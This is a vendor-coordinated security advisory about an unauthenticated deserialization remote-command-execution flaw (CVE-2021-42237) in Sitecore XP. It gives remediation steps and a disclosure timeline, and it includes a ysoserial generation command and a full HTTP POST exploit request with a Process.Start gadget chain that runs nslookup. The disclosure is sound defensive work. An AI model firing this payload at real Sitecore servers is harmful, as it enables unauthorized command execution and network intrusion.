Advisory: Sitecore RCE via Insecure Deserialization - CVE-2021-42237

Nov 2, 2021


Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to remote command execution through insecure deserialization. This vulnerability can be exploited without authentication and allows attackers to execute arbitrary commands on the host machine.


An attacker can execute arbitrary commands on the host machine running Sitecore. Sitecore is typically hosted on Windows, and in many cases the machines hosting Sitecore are also connected to a Windows domain. Opportunistic hackers could use this vulnerability as an entry point into an internal network / domain.

Affected Software

Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7

Product Description

Sitecore’s Experience Platform (XP) is an enterprise content management system (CMS). This CMS is used heavily by enterprises, including many of the companies within the fortune 500.

Sitecore XP provides you with tools for content management, digital marketing, and analyzing and reporting.


In order to remediate this vulnerability, simply remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/.

The official remediation advice can be found here.

It suggests the following:

For Sitecore XP 7.5.0 - Sitecore XP 7.5.2, use one of the following solutions:
Upgrade your Sitecore XP instance to Sitecore XP 9.0.0 or higher.
Consider the necessity of the Executive Insight Dashboard and remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
Upgrade your Sitecore XP instance to Sitecore XP 8.0.0 - Sitecore XP 8.2.7 version and apply the solution below.
For Sitecore XP 8.0.0 - Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.
Note: The Report.ashx file is no longer used and can safely be removed.


Using ysoserial we were able to generate a serialized payload which leads to RCE:

./ysoserial.exe -f NetDataContractSerializer -g TypeConfuseDelegate -c "nslookup" -o base64 -t

The final payload to get command execution looks like the following:

POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1
Host: sitecore.local
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Connection: close
Content-Type: text/xml
Content-Length: 5919

<?xml version="1.0" ?>
        <parameter name="">
            <ArrayOfstring z:Id="1" z:Type="System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="System, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089"
                <Count z:Id="2" z:Type="System.Int32" z:Assembly="0"
                <Comparer z:Id="3" z:Type="System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="0"
                    <_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0"
                        <Delegate z:Id="5" z:Type="System.DelegateSerializationHolder+DelegateEntry" z:Assembly="0"
                            <a:assembly z:Id="6">mscorlib, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly>
                            <a:delegateEntry z:Id="7">
                                <a:assembly z:Ref="6" i:nil="true"/>
                                <a:delegateEntry i:nil="true"/>
                                <a:methodName z:Id="8">Compare</a:methodName>
                                <a:target i:nil="true"/>
                                <a:targetTypeAssembly z:Ref="6" i:nil="true"/>
                                <a:targetTypeName z:Id="9">System.String</a:targetTypeName>
                                <a:type z:Id="10">System.Comparison`1[[System.String, mscorlib, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>
                            <a:methodName z:Id="11">Start</a:methodName>
                            <a:target i:nil="true"/>
                            <a:targetTypeAssembly z:Id="12">System, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:targetTypeAssembly>
                            <a:targetTypeName z:Id="13">System.Diagnostics.Process</a:targetTypeName>
                            <a:type z:Id="14">System.Func`3[[System.String, mscorlib, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>
                        <method0 z:Id="15" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
                            <Name z:Ref="11" i:nil="true"/>
                            <AssemblyName z:Ref="12" i:nil="true"/>
                            <ClassName z:Ref="13" i:nil="true"/>
                            <Signature z:Id="16" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature>
                            <Signature2 z:Id="17" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature2>
                            <MemberType z:Id="18" z:Type="System.Int32" z:Assembly="0">8</MemberType>
                            <GenericArguments i:nil="true"/>
                        <method1 z:Id="19" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
                            <Name z:Ref="8" i:nil="true"/>
                            <AssemblyName z:Ref="6" i:nil="true"/>
                            <ClassName z:Ref="9" i:nil="true"/>
                            <Signature z:Id="20" z:Type="System.String" z:Assembly="0">Int32 Compare(System.String, System.String)</Signature>
                            <Signature2 z:Id="21" z:Type="System.String" z:Assembly="0">System.Int32 Compare(System.String, System.String)</Signature2>
                            <MemberType z:Id="22" z:Type="System.Int32" z:Assembly="0">8</MemberType>
                            <GenericArguments i:nil="true"/>
                <Version z:Id="23" z:Type="System.Int32" z:Assembly="0"
                <Items z:Id="24" z:Type="System.String[]" z:Assembly="0" z:Size="2"
                    <string z:Id="25"
                        xmlns="">/c nslookup</string>
                    <string z:Id="26"

The above payload will execute cmd /c nslookup

Blog Post

The blog post detailing the discovery process for this issue can be found here.


Assetnote Security Research Team


  • 20/09/2021 - Reported to Sitecore
  • 23/09/2021 - Initial response from Sitecore
  • 08/10/2021 - Advisory published on Sitecore website
  • 02/11/2021 - Blog post published on Assetnote blog